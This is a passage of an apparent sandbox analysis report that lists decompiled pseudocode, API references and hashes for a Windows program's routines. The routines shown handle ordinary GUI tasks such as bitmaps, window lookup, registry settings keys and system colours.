                                                      				} else {
                                                      					if(__ebx > 0x20) {
                                                      						__ebx = 0x20;
                                                      					}
                                                      					__eax = __ebx - 4;
                                                      					asm("cdq");
                                                      					__eax = __ebx - 4 - __edx;
                                                      					__esi = __ebx + 0xf;
                                                      					__esi = __ebx + 0xf >> 4;
                                                      					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
                                                      					__esi = __esi << 4;
                                                      					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
                                                      					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
                                                      					if(__edi > 0xc) {
                                                      						__edi = 0xc;
                                                      					}
                                                      					__eax = 0x20;
                                                      					if(__ecx > __eax) {
                                                      						_v24 = __eax;
                                                      					}
                                                      					 &_v12 = E0041F330(__edi,  &_v12, 0xff, 0x80);
                                                      					_v24 = _v24 + 0xfffffffa;
                                                      					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
                                                      					__ecx = __esi + __esi;
                                                      					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
                                                      					__edx = 0x435374;
                                                      					_v20 = __esi + __esi;
                                                      					_v16 = 5;
                                                      					do {
                                                      						__si =  *__edx & 0x000000ff;
                                                      						__ecx = __edi;
                                                      						__si = ( *__edx & 0x000000ff) << __cl;
                                                      						__edx =  &(__edx[1]);
                                                      						__ecx = __si & 0x0000ffff;
                                                      						__eax->i = __ch;
                                                      						__eax->i = __cl;
                                                      						__eax = __eax + _v20;
                                                      						_t21 =  &_v16;
                                                      						 *_t21 = _v16 - 1;
                                                      					} while ( *_t21 != 0);
                                                      					__eax =  &_v12;
                                                      					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
                                                      					_pop(__edi);
                                                      					_pop(__esi);
                                                      					 *0x4465c8 = __eax;
                                                      					_pop(__ebx);
                                                      					if(__eax == 0) {
                                                      						__eax = LoadBitmapA(__eax, 0x7fe3);
                                                      						 *0x4465c8 = __eax;
                                                      					}
                                                      					__ecx = _a116;
                                                      					__ecx = _a116 ^ __ebp;
                                                      					__eax = E0041E5DF(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
                                                      					__ebp =  &_a120;
                                                      					__esp =  &_a120;
                                                      					_pop(__ebp);
                                                      					return __eax;
                                                      				}
                                                      			}

                                                      APIs
                                                      • GetMenuCheckMarkDimensions.USER32 ref: 00404AD5
                                                      • _memset.LIBCMT ref: 00404B37
                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00404B89
                                                      • LoadBitmapA.USER32 ref: 00404BA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                      • String ID: $tSC
                                                      • API String ID: 4271682439-84426305
                                                      • Opcode ID: 1fb548bed39b3eef695a2972ddbee2fea5d738d9e9ebe4badec35ea53fb165ee
                                                      • Instruction ID: f93c5f26688163433edc60361cc36291d0a2f72699a6ff0e350c35afdfd69af5
                                                      • Opcode Fuzzy Hash: 1fb548bed39b3eef695a2972ddbee2fea5d738d9e9ebe4badec35ea53fb165ee
                                                      • Instruction Fuzzy Hash: 153109B2A002099FEB10CFB8DC85ABE7BB5EB84304F15043BE602EB2D1D674D945C754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00418F07(void* __ebx, void* __ecx) {
                                                      				void* __ebp;
                                                      				void* _t28;
                                                      				void* _t36;
                                                      				signed char _t37;
                                                      				intOrPtr _t41;
                                                      				void* _t42;
                                                      				void* _t44;
                                                      				intOrPtr _t45;
                                                      				void* _t46;
                                                      
                                                      				_t39 = __ecx;
                                                      				_t36 = __ebx;
                                                      				_t41 =  *((intOrPtr*)(_t46 + 0x10));
                                                      				if(_t41 == 0) {
                                                      					_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                      					L14:
                                                      					_t42 = E00409C97(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
                                                      					if(_t42 != 0) {
                                                      						L7:
                                                      						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
                                                      							L18:
                                                      							return _t42;
                                                      						}
                                                      						_push(_t36);
                                                      						_t37 =  *(_t46 + 0x1c);
                                                      						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
                                                      							if((_t37 & 0x00000002) == 0) {
                                                      								L16:
                                                      								_push(_t37);
                                                      								_push(0);
                                                      								_push(_t42);
                                                      								goto L17;
                                                      							}
                                                      							_t39 = _t42;
                                                      							if(E0040CA70(_t42) != 0) {
                                                      								goto L16;
                                                      							}
                                                      							goto L12;
                                                      						} else {
                                                      							L12:
                                                      							_push(_t37);
                                                      							_push(_t42);
                                                      							_push(_t45);
                                                      							L17:
                                                      							_t42 = E00418F07(_t37, _t39);
                                                      							goto L18;
                                                      						}
                                                      					}
                                                      					return _t45;
                                                      				}
                                                      				_t28 = E00409C97(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
                                                      				_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                      				while(_t28 == 0) {
                                                      					_t41 = E00418EB2(_t45, E00409C97(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
                                                      					if(_t41 == 0 || _t41 == _t45) {
                                                      						goto L14;
                                                      					} else {
                                                      						_t28 = E00409C97(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
                                                      						continue;
                                                      					}
                                                      				}
                                                      				_t42 = E00409C97(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
                                                      				goto L7;
                                                      			}













                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window$LongParentVisible
                                                      • String ID:
                                                      • API String ID: 506644340-0
                                                      • Opcode ID: 46e72c5683fd03fb34599a0f95d5ff76554a5fa3dadfd6045a368a77cb432448
                                                      • Instruction ID: 5631cdc5cc6889daffde78f578d4d612bd2c5089616566f59ea8a3a8e6a984d0
                                                      • Opcode Fuzzy Hash: 46e72c5683fd03fb34599a0f95d5ff76554a5fa3dadfd6045a368a77cb432448
                                                      • Instruction Fuzzy Hash: EE21F832A047146BD6206B758C09FEB779DBF84754F050A2EF985A7291DB2CEC41C698
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00406653(intOrPtr __ecx) {
                                                      				void* _v8;
                                                      				void* _v12;
                                                      				void* _v16;
                                                      				int _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _t32;
                                                      
                                                      				_t32 = __ecx;
                                                      				_v24 = __ecx;
                                                      				_v16 = 0;
                                                      				_v8 = 0;
                                                      				_v12 = 0;
                                                      				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                      					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                      				}
                                                      				if(_v8 != 0) {
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				if(_v12 != 0) {
                                                      					RegCloseKey(_v12);
                                                      				}
                                                      				return _v16;
                                                      			}










                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00406681
                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004066A4
                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004066C0
                                                      • RegCloseKey.ADVAPI32(?), ref: 004066D0
                                                      • RegCloseKey.ADVAPI32(?), ref: 004066DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CloseCreate$Open
                                                      • String ID: software
                                                      • API String ID: 1740278721-2010147023
                                                      • Opcode ID: 82500bd82a10186b28fc24c1a7056618e6e1782bf6ab030e2217d6fa9fd66f96
                                                      • Instruction ID: bc813771eb951e0115408790e1de8cf4d033a672c96248005cb1173a93d838a7
                                                      • Opcode Fuzzy Hash: 82500bd82a10186b28fc24c1a7056618e6e1782bf6ab030e2217d6fa9fd66f96
                                                      • Instruction Fuzzy Hash: 4F11F876E01158FBCB21DF9ADD84CEFBFBCEF85750B1040AAA601A2121D2719A14DB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E0040F402(void* __ecx, long* __edi, void* __esi) {
                                                      				long _t22;
                                                      				void* _t23;
                                                      				void* _t28;
                                                      				void* _t31;
                                                      				void* _t33;
                                                      				signed int _t35;
                                                      				long* _t40;
                                                      				void* _t41;
                                                      				void* _t42;
                                                      
                                                      				_t41 = __esi;
                                                      				_t40 = __edi;
                                                      				_t31 = __ecx;
                                                      				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                                                      				E0041F7F4(0, 0);
                                                      				_t22 = E0040EAD1(_t31, 0, __edi[3], 4);
                                                      				_t33 = 2;
                                                      				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                                                      				_t46 = _t23;
                                                      				if(_t23 == 0) {
                                                      					LeaveCriticalSection( *(_t42 - 0x14));
                                                      					_t23 = E004037AF(0, _t33, __edi, __esi, _t46);
                                                      				}
                                                      				 *(_t41 + 0xc) = _t23;
                                                      				E0041F330(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                                                      				 *(_t41 + 8) = _t40[3];
                                                      				TlsSetValue( *_t40, _t41);
                                                      				_t35 =  *(_t42 + 8);
                                                      				_t28 =  *(_t41 + 0xc);
                                                      				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                                                      					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                                                      				}
                                                      				_push( *(_t42 - 0x14));
                                                      				LeaveCriticalSection();
                                                      				return E0041F7C2(_t28);
                                                      			}













                                                      APIs
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0040F409
                                                      • __CxxThrowException@8.LIBCMT ref: 0040F413
                                                        • Part of subcall function 0041F7F4: RaiseException.KERNEL32(?,?,?,?), ref: 0041F834
                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004), ref: 0040F42A
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F437
                                                        • Part of subcall function 004037AF: __CxxThrowException@8.LIBCMT ref: 004037C3
                                                      • _memset.LIBCMT ref: 0040F456
                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 0040F467
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F488
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                      • String ID:
                                                      • API String ID: 356813703-0
                                                      • Opcode ID: 9a583ed615a21241be3b18dce36bb94a94ae7a546afbdb5bd567d3504d28efd3
                                                      • Instruction ID: fd93560edbf6851b4f3960d9b72a4f37630a2f2519325dc6941088bc0f039299
                                                      • Opcode Fuzzy Hash: 9a583ed615a21241be3b18dce36bb94a94ae7a546afbdb5bd567d3504d28efd3
                                                      • Instruction Fuzzy Hash: DC11C274100605AFCB20AF50DC89C6BBBA9FF54308760C13EF816A25A1CB34AE95CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040EF21(void* __ecx) {
                                                      				struct HBRUSH__* _t14;
                                                      				void* _t18;
                                                      
                                                      				_t18 = __ecx;
                                                      				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                                      				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                                      				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                                      				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                                      				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                                      				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                                      				_t14 = GetSysColorBrush(6);
                                                      				 *(_t18 + 0x20) = _t14;
                                                      				return _t14;
                                                      			}






                                                      APIs
                                                      • GetSysColor.USER32(0000000F), ref: 0040EF2D
                                                      • GetSysColor.USER32(00000010), ref: 0040EF34
                                                      • GetSysColor.USER32(00000014), ref: 0040EF3B
                                                      • GetSysColor.USER32(00000012), ref: 0040EF42
                                                      • GetSysColor.USER32(00000006), ref: 0040EF49
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0040EF56
                                                      • GetSysColorBrush.USER32(00000006), ref: 0040EF5D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Color$Brush
                                                      • String ID:
                                                      • API String ID: 2798902688-0
                                                      • Opcode ID: 6b616b1b9c3c417a51a19aefae0052fa6c7b88ea5b2225527b113589cbbc0862
                                                      • Instruction ID: f59acb6467372613553c355d87f79defc1ce8ae1078b4449624b824b30ee7355
                                                      • Opcode Fuzzy Hash: 6b616b1b9c3c417a51a19aefae0052fa6c7b88ea5b2225527b113589cbbc0862
                                                      • Instruction Fuzzy Hash: F0F0F871A407489BD730BB729D09B47BAE1EFC4B10F02192ED2818BA90E6B6E0409F44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00433C38() {
                                                      				long _t5;
                                                      				int _t6;
                                                      
                                                      				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                                      					_t5 = GetVersion();
                                                      					if((0x80000000 & _t5) != 0) {
                                                      						L5:
                                                      						 *0x44680c =  *0x44680c & 0x00000000;
                                                      						return _t5;
                                                      					}
                                                      					_t5 = GetVersion();
                                                      					if(_t5 != 3) {
                                                      						goto L5;
                                                      					}
                                                      					goto L4;
                                                      				} else {
                                                      					L4:
                                                      					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                                      					 *0x44680c = _t6;
                                                      					return _t6;
                                                      				}
                                                      			}






                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Version$ClipboardFormatRegister
                                                      • String ID: MSWHEEL_ROLLMSG
                                                      • API String ID: 2888461884-2485103130
                                                      • Opcode ID: 6e13466c39be63d6abcca6283d65c4debe34d0bda91c07c1490ada4aa240426f
                                                      • Instruction ID: 4356ce2cf077731b6ec7b5d007e1485f223b33f16df30197ff0064379991df0c
                                                      • Opcode Fuzzy Hash: 6e13466c39be63d6abcca6283d65c4debe34d0bda91c07c1490ada4aa240426f
                                                      • Instruction Fuzzy Hash: 30E04F7B8015135EE7112F69BC043A627945BAE392F56B03B9D01A22509A3C19438EBE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405957(struct HWND__* _a4, struct HWND__** _a8) {
                                                      				struct HWND__* _t7;
                                                      				void* _t13;
                                                      				struct HWND__** _t15;
                                                      				struct HWND__* _t16;
                                                      				struct HWND__* _t17;
                                                      				struct HWND__* _t18;
                                                      
                                                      				_t18 = _a4;
                                                      				_t17 = _t18;
                                                      				if(_t18 != 0) {
                                                      					L5:
                                                      					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                      						L8:
                                                      						_t16 = _t17;
                                                      						_t7 = _t17;
                                                      						if(_t17 == 0) {
                                                      							L10:
                                                      							if(_t18 == 0 && _t17 != 0) {
                                                      								_t17 = GetLastActivePopup(_t17);
                                                      							}
                                                      							_t15 = _a8;
                                                      							if(_t15 != 0) {
                                                      								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                      									 *_t15 =  *_t15 & 0x00000000;
                                                      								} else {
                                                      									 *_t15 = _t16;
                                                      									EnableWindow(_t16, 0);
                                                      								}
                                                      							}
                                                      							return _t17;
                                                      						} else {
                                                      							goto L9;
                                                      						}
                                                      						do {
                                                      							L9:
                                                      							_t16 = _t7;
                                                      							_t7 = GetParent(_t7);
                                                      						} while (_t7 != 0);
                                                      						goto L10;
                                                      					}
                                                      					_t17 = GetParent(_t17);
                                                      					L7:
                                                      					if(_t17 != 0) {
                                                      						goto L5;
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      				_t13 = E00405880();
                                                      				if(_t13 != 0) {
                                                      					L4:
                                                      					_t17 =  *(_t13 + 0x20);
                                                      					goto L7;
                                                      				}
                                                      				_t13 = E00403ED6();
                                                      				if(_t13 != 0) {
                                                      					goto L4;
                                                      				}
                                                      				_t17 = 0;
                                                      				goto L8;
                                                      			}










                                                      APIs
                                                      • GetWindowLongA.USER32 ref: 00405989
                                                      • GetParent.USER32(00401257), ref: 00405997
                                                      • GetParent.USER32(00401257), ref: 004059AA
                                                      • GetLastActivePopup.USER32(00401257), ref: 004059B9
                                                      • IsWindowEnabled.USER32(00401257), ref: 004059CE
                                                      • EnableWindow.USER32(00401257,00000000), ref: 004059E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                      • String ID:
                                                      • API String ID: 670545878-0
                                                      • Opcode ID: 3b1ec5fce5c6df1d94cf4d325c1fcdaf986b697a71e109a9ef266bcaa307bb9b
                                                      • Instruction ID: 0fd042f9c84c3817d672c4b8ef0a745a4829e1649fc024bfe0b5622049980979
                                                      • Opcode Fuzzy Hash: 3b1ec5fce5c6df1d94cf4d325c1fcdaf986b697a71e109a9ef266bcaa307bb9b
                                                      • Instruction Fuzzy Hash: 52118CB2605B21DBD6222A699844B6BB69CDF64B70F150136EC00F3395DB78DC019EED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 38%
                                                      			E0040F839(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                      				struct tagRECT _v20;
                                                      				struct HWND__* _t12;
                                                      				struct HWND__* _t21;
                                                      
                                                      				ClientToScreen(_a4,  &_a8);
                                                      				_push(5);
                                                      				_push(_a4);
                                                      				while(1) {
                                                      					_t12 = GetWindow();
                                                      					_t21 = _t12;
                                                      					if(_t21 == 0) {
                                                      						break;
                                                      					}
                                                      					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                      						GetWindowRect(_t21,  &_v20);
                                                      						_push(_a12);
                                                      						if(PtInRect( &_v20, _a8) != 0) {
                                                      							return _t21;
                                                      						}
                                                      					}
                                                      					_push(2);
                                                      					_push(_t21);
                                                      				}
                                                      				return _t12;
                                                      			}







                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                      • String ID:
                                                      • API String ID: 1315500227-0
                                                      • Opcode ID: b6dff1484203bce84157c908e257711b99aee86806842bf46e6917bca70776a7
                                                      • Instruction ID: f664ab31a6303e9d539a40d152b99c50a5e09be0de03728c9acbdc8a8ff8b10d
                                                      • Opcode Fuzzy Hash: b6dff1484203bce84157c908e257711b99aee86806842bf46e6917bca70776a7
                                                      • Instruction Fuzzy Hash: E2016236600515ABDB216F94DC08EEF376CEF84751F048136FD11B75A0D738EA158B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E00410A89(intOrPtr __ebx, void** __ecx, void* __edx, intOrPtr __esi, char* _a4, short _a8) {
                                                      				signed int _v8;
                                                      				short _v72;
                                                      				char* _v76;
                                                      				signed int _v80;
                                                      				signed int* _v84;
                                                      				signed int _v88;
                                                      				intOrPtr _v92;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				signed int _t54;
                                                      				intOrPtr _t66;
                                                      				short* _t70;
                                                      				signed int _t72;
                                                      				signed int _t81;
                                                      				signed int* _t83;
                                                      				short* _t84;
                                                      				void* _t91;
                                                      				signed int* _t98;
                                                      				signed int _t99;
                                                      				void** _t100;
                                                      				intOrPtr _t102;
                                                      				signed int _t104;
                                                      				signed int _t106;
                                                      				void* _t107;
                                                      
                                                      				_t101 = __esi;
                                                      				_t97 = __edx;
                                                      				_t82 = __ebx;
                                                      				_t54 =  *0x443590; // 0x8ffedb05
                                                      				_v8 = _t54 ^ _t106;
                                                      				_t100 = __ecx;
                                                      				_v76 = _a4;
                                                      				if(__ecx[1] != 0) {
                                                      					_push(__ebx);
                                                      					_push(__esi);
                                                      					_t83 = GlobalLock( *__ecx);
                                                      					_v84 = _t83;
                                                      					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                      					_v80 = E004108CC(_t83);
                                                      					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                      					_v92 = _t102;
                                                      					if(_v88 == 0) {
                                                      						 *_t83 =  *_t83 | 0x00000040;
                                                      					} else {
                                                      						_t83[3] = _t83[3] | 0x00000040;
                                                      					}
                                                      					if(lstrlenA(_v76) >= 0x20) {
                                                      						L15:
                                                      						_t66 = 0;
                                                      					} else {
                                                      						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                      						_v76 = _t97;
                                                      						if(_t97 < _t102) {
                                                      							goto L15;
                                                      						} else {
                                                      							_t70 = E004108F7(_t83);
                                                      							_t91 = 0;
                                                      							_t84 = _t70;
                                                      							if(_v80 != 0) {
                                                      								_t81 = E0041E982(_t84 + _t102);
                                                      								_t97 = _v76;
                                                      								_t91 = _t102 + 2 + _t81 * 2;
                                                      							}
                                                      							_t33 = _t97 + 3; // 0x3
                                                      							_t98 = _v84;
                                                      							_t36 = _t84 + 3; // 0x10002
                                                      							_t72 = _t91 + _t36 & 0xfffffffc;
                                                      							_t104 = _t84 + _t33 & 0xfffffffc;
                                                      							_v80 = _t72;
                                                      							if(_v88 == 0) {
                                                      								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                      							} else {
                                                      								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                      							}
                                                      							if(_v76 == _t91 || _t99 <= 0) {
                                                      								L17:
                                                      								 *_t84 = _a8;
                                                      								_t97 =  &_v72;
                                                      								E00410A0C(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                      								_t100[1] = _t100[1] + _t104 - _v80;
                                                      								GlobalUnlock( *_t100);
                                                      								_t100[2] = _t100[2] & 0x00000000;
                                                      								_t66 = 1;
                                                      							} else {
                                                      								_t97 = _t100[1];
                                                      								_t95 = _t97 - _t72 + _v84;
                                                      								if(_t97 - _t72 + _v84 <= _t97) {
                                                      									E00410A0C(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                      									_t107 = _t107 + 0x10;
                                                      									goto L17;
                                                      								} else {
                                                      									goto L15;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_pop(_t101);
                                                      					_pop(_t82);
                                                      				} else {
                                                      					_t66 = 0;
                                                      				}
                                                      				return E0041E5DF(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                      			}




























                                                      APIs
                                                      • GlobalLock.KERNEL32 ref: 00410AB3
                                                      • lstrlenA.KERNEL32(?), ref: 00410AFB
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00410B15
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                      • String ID: System
                                                      • API String ID: 1529587224-3470857405
